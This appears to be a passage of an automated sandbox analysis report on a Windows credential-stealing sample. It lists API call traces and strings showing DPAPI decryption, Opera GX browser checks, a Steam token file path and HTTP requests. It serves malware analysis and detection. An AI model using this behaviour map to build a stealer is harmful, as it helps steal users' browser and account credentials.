                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                                                                                                                                                                                                                    • String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
                                                                                                                                                                                                                                                    • API String ID: 2929475105-3463377506
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0040FD10: lstrcpy.KERNEL32(00000000), ref: 0040FD38
                                                                                                                                                                                                                                                      • Part of subcall function 00405960: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004059D8
                                                                                                                                                                                                                                                      • Part of subcall function 00405960: StrCmpCA.SHLWAPI(?,015CF600,?,?,?,?,?,?,00000004), ref: 004059F0
                                                                                                                                                                                                                                                      • Part of subcall function 00405960: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405A14
                                                                                                                                                                                                                                                      • Part of subcall function 00405960: HttpOpenRequestA.WININET(00000000,GET,?,015D2480,00000000,00000000,-00400100,00000000), ref: 00405A4B
                                                                                                                                                                                                                                                      • Part of subcall function 00405960: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405A6F
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413932
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Internet$Open$ConnectHttpOptionRequestlstrcpy
                                                                                                                                                                                                                                                    • String ID: C!B$ERROR$ERROR
                                                                                                                                                                                                                                                    • API String ID: 1815705353-1759716129
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrlenA.KERNEL32(?,?,?,?,?,?,004214E9,000000FF,?,00418113,?,015C2E10,?), ref: 0040FECC
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcpy.KERNEL32(00000000), ref: 0040FEF7
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcat.KERNEL32(?,?), ref: 0040FF01
                                                                                                                                                                                                                                                      • Part of subcall function 0040FDB0: lstrcpy.KERNEL32(00000000), ref: 0040FDF0
                                                                                                                                                                                                                                                      • Part of subcall function 00411310: GetSystemTime.KERNEL32(?,015CF0B0,004270A0,?,00000000,00000008,?,?,00000000,004216B1,000000FF,?,0040452E,0041F9D9,00000014), ref: 00411365
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcpy.KERNEL32(00000000), ref: 0040FE63
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcat.KERNEL32(?,00000000), ref: 0040FE6F
                                                                                                                                                                                                                                                    • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,004268DA,00000009), ref: 0040A107
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0040A2EB
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0040A2FF
                                                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(00000000), ref: 0040A381
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 211194620-0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                      • Part of subcall function 00406D60: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,00000002,?,0040C83D,?,00000000,?,00000000), ref: 00406D97
                                                                                                                                                                                                                                                      • Part of subcall function 00406D60: GetFileSizeEx.KERNEL32(00000000,?,?,00000002,?,0040C83D,?,00000000,?,00000000,?,00000000), ref: 00406DAD
                                                                                                                                                                                                                                                      • Part of subcall function 00406D60: LocalAlloc.KERNEL32(00000040,?,00000000,?,00000002,?,0040C83D,?,00000000,?,00000000,?,00000000), ref: 00406DC8
                                                                                                                                                                                                                                                      • Part of subcall function 00406D60: ReadFile.KERNEL32(00000000,00000000,?,00000002,00000000,?,00000002,?,0040C83D,?,00000000,?,00000000,?,00000000), ref: 00406DE1
                                                                                                                                                                                                                                                      • Part of subcall function 00406D60: CloseHandle.KERNEL32(00000000,?,00000002,?,0040C83D,?,00000000,?,00000000,?,00000000), ref: 00406E09
                                                                                                                                                                                                                                                      • Part of subcall function 00411590: LocalAlloc.KERNEL32(00000040,00413AC1,?,00000001,00000004,?,00413AC0,00000000,00000000), ref: 004115AC
                                                                                                                                                                                                                                                    • StrStrA.SHLWAPI(00000000,015D1FB8,?,?,?,?,?,?,?,?,?,?,?,00421360,?), ref: 0040CD2B
                                                                                                                                                                                                                                                      • Part of subcall function 00406E30: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004063BB,00000000,00000000), ref: 00406E57
                                                                                                                                                                                                                                                      • Part of subcall function 00406E30: LocalAlloc.KERNEL32(00000040,00000000,?,004063BB,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406E66
                                                                                                                                                                                                                                                      • Part of subcall function 00406E30: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004063BB,00000000,00000000), ref: 00406E7D
                                                                                                                                                                                                                                                      • Part of subcall function 00406E30: LocalFree.KERNEL32(?,?,004063BB,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406E8C
                                                                                                                                                                                                                                                    • memcmp.MSVCRT ref: 0040CD69
                                                                                                                                                                                                                                                      • Part of subcall function 00406EB0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00406ED5
                                                                                                                                                                                                                                                      • Part of subcall function 00406EB0: LocalAlloc.KERNEL32(00000040,?,?), ref: 00406EED
                                                                                                                                                                                                                                                      • Part of subcall function 00406EB0: LocalFree.KERNEL32(?), ref: 00406F0E
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Local$Alloc$CryptFile$BinaryFreeString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmp
                                                                                                                                                                                                                                                    • String ID: $DPAPI
                                                                                                                                                                                                                                                    • API String ID: 512175977-1819349886
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410395
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0041039C
                                                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000002,015CB3D8,00000000,00020119,00000000), ref: 004103BB
                                                                                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(00000000,015D17E8,00000000,00000000,00000000,000000FF), ref: 004103D6
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Heap$AllocOpenProcessQueryValue
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3676486918-0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(00000000,Opera GX,00426903,00426902,?,?), ref: 0040E22D
                                                                                                                                                                                                                                                      • Part of subcall function 00411530: SHGetFolderPathA.SHELL32(00000000,^iB,00000000,00000000,?,00000000), ref: 00411568
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcpy.KERNEL32(00000000), ref: 0040FE63
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcat.KERNEL32(?,00000000), ref: 0040FE6F
                                                                                                                                                                                                                                                      • Part of subcall function 0040FDB0: lstrcpy.KERNEL32(00000000), ref: 0040FDF0
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrlenA.KERNEL32(?,?,?,?,?,?,004214E9,000000FF,?,00418113,?,015C2E10,?), ref: 0040FECC
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcpy.KERNEL32(00000000), ref: 0040FEF7
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcat.KERNEL32(?,?), ref: 0040FF01
                                                                                                                                                                                                                                                      • Part of subcall function 0040FD10: lstrcpy.KERNEL32(00000000), ref: 0040FD38
                                                                                                                                                                                                                                                      • Part of subcall function 004114D0: GetFileAttributesA.KERNEL32(00000000,00000000,00000000,004216C8,000000FF,?,0040E60A,?,00000000,00000000,00000000,?,?), ref: 004114F7
                                                                                                                                                                                                                                                      • Part of subcall function 0040CCC0: StrStrA.SHLWAPI(00000000,015D1FB8,?,?,?,?,?,?,?,?,?,?,?,00421360,?), ref: 0040CD2B
                                                                                                                                                                                                                                                      • Part of subcall function 0040CCC0: memcmp.MSVCRT ref: 0040CD69
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcpy$lstrcat$AttributesFileFolderPathlstrlenmemcmp
                                                                                                                                                                                                                                                    • String ID: $$Opera GX
                                                                                                                                                                                                                                                    • API String ID: 1439182418-3699434461
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00413C60
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413D2F
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrlen
                                                                                                                                                                                                                                                    • String ID: ERROR
                                                                                                                                                                                                                                                    • API String ID: 1659193697-2861137601
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8,004221C1,004162C0,?,?,?,00000001), ref: 00415315
                                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,00413C30,?,00000000,00000000), ref: 00415336
                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00415342
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CreateObjectSingleSleepThreadWait
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4198075804-0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6C6D3095
                                                                                                                                                                                                                                                      • Part of subcall function 6C6D35A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6C75F688,00001000), ref: 6C6D35D5
                                                                                                                                                                                                                                                      • Part of subcall function 6C6D35A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C6D35E0
                                                                                                                                                                                                                                                      • Part of subcall function 6C6D35A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6C6D35FD
                                                                                                                                                                                                                                                      • Part of subcall function 6C6D35A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C6D363F
                                                                                                                                                                                                                                                      • Part of subcall function 6C6D35A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C6D369F
                                                                                                                                                                                                                                                      • Part of subcall function 6C6D35A0: __aulldiv.LIBCMT ref: 6C6D36E4
                                                                                                                                                                                                                                                    • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C6D309F
                                                                                                                                                                                                                                                      • Part of subcall function 6C6F5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C6F56EE,?,00000001), ref: 6C6F5B85
                                                                                                                                                                                                                                                      • Part of subcall function 6C6F5B50: EnterCriticalSection.KERNEL32(6C75F688,?,?,?,6C6F56EE,?,00000001), ref: 6C6F5B90
                                                                                                                                                                                                                                                      • Part of subcall function 6C6F5B50: LeaveCriticalSection.KERNEL32(6C75F688,?,?,?,6C6F56EE,?,00000001), ref: 6C6F5BD8
                                                                                                                                                                                                                                                      • Part of subcall function 6C6F5B50: GetTickCount64.KERNEL32 ref: 6C6F5BE4
                                                                                                                                                                                                                                                    • ?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6C6D30BE
                                                                                                                                                                                                                                                      • Part of subcall function 6C6D30F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6C6D3127
                                                                                                                                                                                                                                                      • Part of subcall function 6C6D30F0: __aulldiv.LIBCMT ref: 6C6D3140
                                                                                                                                                                                                                                                      • Part of subcall function 6C70AB2A: __onexit.LIBCMT ref: 6C70AB30
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4291168024-0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,?), ref: 0041189C
                                                                                                                                                                                                                                                    • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 004118B7
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004118BE
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3183270410-0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(?,?,00000040,Vj@,?,?,?,?,00406A56,?,?,?,?,00000000), ref: 00406975
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                                                                                    • String ID: Vj@
                                                                                                                                                                                                                                                    • API String ID: 544645111-2126399917
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • SHGetFolderPathA.SHELL32(00000000,^iB,00000000,00000000,?,00000000), ref: 00411568
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FolderPathlstrcpy
                                                                                                                                                                                                                                                    • String ID: ^iB
                                                                                                                                                                                                                                                    • API String ID: 1699248803-3045993210
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(00000000,00000000,00000000,004216C8,000000FF,?,0040E60A,?,00000000,00000000,00000000,?,?), ref: 004114F7
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                                                                    • API String ID: 3188754299-3946550938
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetCurrentHwProfileA.ADVAPI32(?), ref: 00410B95
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CurrentProfilelstrcpy
                                                                                                                                                                                                                                                    • String ID: Unknown
                                                                                                                                                                                                                                                    • API String ID: 2831436455-1654365787
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Sleep
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3472027048-3916222277
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrlenA.KERNEL32(?,?,?,?,?,?,004214E9,000000FF,?,00418113,?,015C2E10,?), ref: 0040FECC
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcpy.KERNEL32(00000000), ref: 0040FEF7
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcat.KERNEL32(?,?), ref: 0040FF01
                                                                                                                                                                                                                                                      • Part of subcall function 0040FDB0: lstrcpy.KERNEL32(00000000), ref: 0040FDF0
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,00000000,?,00000000,004271AE,?,00000000,00422200,000000FF,?,00417E9A,?), ref: 00415437
                                                                                                                                                                                                                                                      • Part of subcall function 00415250: Sleep.KERNEL32(000003E8,004221C1,004162C0,?,?,?,00000001), ref: 00415315
                                                                                                                                                                                                                                                      • Part of subcall function 00415250: CreateThread.KERNEL32(00000000,00000000,00413C30,?,00000000,00000000), ref: 00415336
                                                                                                                                                                                                                                                      • Part of subcall function 00415250: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00415342
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • Soft\Steam\steam_tokens.txt, xrefs: 0041544F
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcpy$lstrlen$CreateObjectSingleSleepThreadWaitlstrcat
                                                                                                                                                                                                                                                    • String ID: Soft\Steam\steam_tokens.txt
                                                                                                                                                                                                                                                    • API String ID: 2356188485-3507145866
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrlenA.KERNEL32(?,?,?,?,?,?,004214E9,000000FF,?,00418113,?,015C2E10,?), ref: 0040FECC
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcpy.KERNEL32(00000000), ref: 0040FEF7
